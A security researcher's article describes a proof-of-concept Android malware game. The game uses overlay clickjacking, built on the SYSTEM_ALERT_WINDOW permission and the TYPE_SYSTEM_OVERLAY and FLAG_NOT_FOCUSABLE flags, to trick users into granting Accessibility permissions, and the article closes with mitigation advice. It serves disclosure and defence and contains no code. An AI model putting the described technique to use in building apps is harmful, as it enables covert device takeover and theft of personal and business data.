Micro Focus is now part of OpenText. Learn more >

You are here

You are here

Inside the Android Accessibility clickjacking malware

Yair Amit Co-founder and CTO, Skycure

Accessibility Services have been incorporated into Android to make devices running the mobile operating system easier to use for people with disabilities, but those services can provide a garden path for an attacker, too. Without rooting a device, malware can be fashioned to exploit the legitimate functions of Accessibility Services and dodge existing protections found on an Android device.

Ordinarily, data within mobile apps is protected by sandboxing, which prevents one app from accessing another's content. So the problem Skycure research manager Elisha Eshed and I posed for ourselves was how to circumvent sandboxing and access any information within apps used for business. We eventually focused on the Accessibility APIs in Android because they allow applications to see the content of other apps, as well as perform actions on them. That made Accessibility Services a perfect target for malware.

However, the designers of Android are well aware that someone might try to exploit the Accessibility APIs for malevolent activity, so they made the process for an app to gain Accessibility permissions a bit tortuous. Five steps are needed to allow a malicious app to tap into Accessibility, and it's all capped off by a security warning. That makes duping a user to give a bad app permission to use Accessibility highly unlikely.

Clickjacking: It's back

We realized that if malware were to take advantage of Accessibility, it would have to do so without the user knowing it. One way we knew that could be done was through a technique called clickjacking. It works by overlaying one application on another application. The overlaying app appears benign to the user. However, as the user clicks on elements on that app, those clicks are actually propagated and processed by the underlying app. When the underlying app is part of the operating system, this can become a major security concern.

This technique, known as clickjacking, used to be a big problem on the web. Malicious websites performed actions on legitimate websites without the victim’s knowledge or consent by using a variety of clickjacking techniques. It has appeared in the Android world, too. Just a month ago, Symantec discovered ransomware, naming it Android.Lockdroid.E, that uses clickjacking to obtain administrative rights on an Android device.

We used the clickjacking concept to get a victim to approve all the steps in giving our bad app permission to use Accessibility without knowing it. We created a whack-a-mole style game we called Rick and Morty. For experts, creating such a game isn't very challenging. Actually, getting the graphics in the game to look good was harder than making the app malicious.

Game on: Whack-a-mole game proves concept

Here's how the attack works. A player clicks on a Mr. Meeseeks moving on the screen. As that's done, what is happening in the background—without the player's knowledge or consent—is clicks are being passed to the permission choices for giving the malicious game use of the device's Accessibility Services.

Enabling our malicious game requires a user to grant it permission to use SYSTEM_ALERT_WINDOW ("draw over other apps”) permission, which allows one app to create a view over another app. This shouldn't raise any suspicions from a user because this technique is used by some popular legitimate apps. It's a permission that users are used to granting. For example, Facebook Messenger's Chat Heads uses it so messages can be read and replied to while using other apps.

A variety of flags can be used to specify a view's position and behavior. In our malicious game, we used TYPE_SYSTEM_OVERLAY to position the game view over everything on  the screen and FLAG_NOT_FOCUSABLE to pass touch events to the Accessibility permissions dialog layer under the overlay.

Once the game is plugged into Accessibility capabilities, it will be able to do pretty much anything the owner of the phone can do. It can perform banking functions, write and read emails, and create and read documents. Whatever an owner does, the attacker can see done and do on behalf of the user without their knowledge. Depending on the attacker's disposition, malicious tasks can be performed automatically or by remote access to the device.

We found that our clickjacking app worked with all versions of Android except the latest two: Android 5.0 and 5.1 Lollipop and 6.0 Marshmallow. In Lollipop, adjustments were made to the operating system to thwart clickjackers. We are currently looking into these mitigations. However, since those versions account for a little over 35% of Android devices in use, the attack would still be effective against nearly two-thirds of all Android devices, or a staggering 500 million devices.

See how the attack works: 

How to block the attack

Users can take a number of measures to reduce the risk of being exploited by a clickjacking attack. If possible, they should upgrade to the latest version of Android. As we have noted, those versions contain better protections against clickjacking attacks. It's also wise not to click on dialog boxes that pop up on a screen unless there's some certainty about what caused them to appear. Sticking to Google Play for app downloads will also lower the risk of bad apps landing on an Android device. Although it's not always realistic to avoid apps from third-party stores, staying clear of them lowers risk, since most infected software for Android come from such outlets.

Another way to thwart attacks on your device is to install a mobile threat defense app. In the desktop and laptop computer world, most users don't think twice about installing antivirus and anti-malware software on their systems, but in the mobile world, the practice is yet to become commonplace. That, though, may change soon.

Gamification delivers new era of attacks

In the past, mobile malware has been more of an inconvenience than a dangerous threat. Malicious apps might pop up unwanted advertising on a phone or send a few SMS messages that resulted in unauthorized charges on a phone bill. These attacks weren't nice, but they weren't terrible. The kind of attack we created—the kind that can take over command of an Android device—moves the needle from something that is annoying to something that is scary, something that can be used to steal sensitive information, both personal and business, from a device.

This attack is the next step in the evolution of malware, and it's a step where the enterprise has a lot to lose.

Keep learning

Read more articles about: App Dev & TestingApp Dev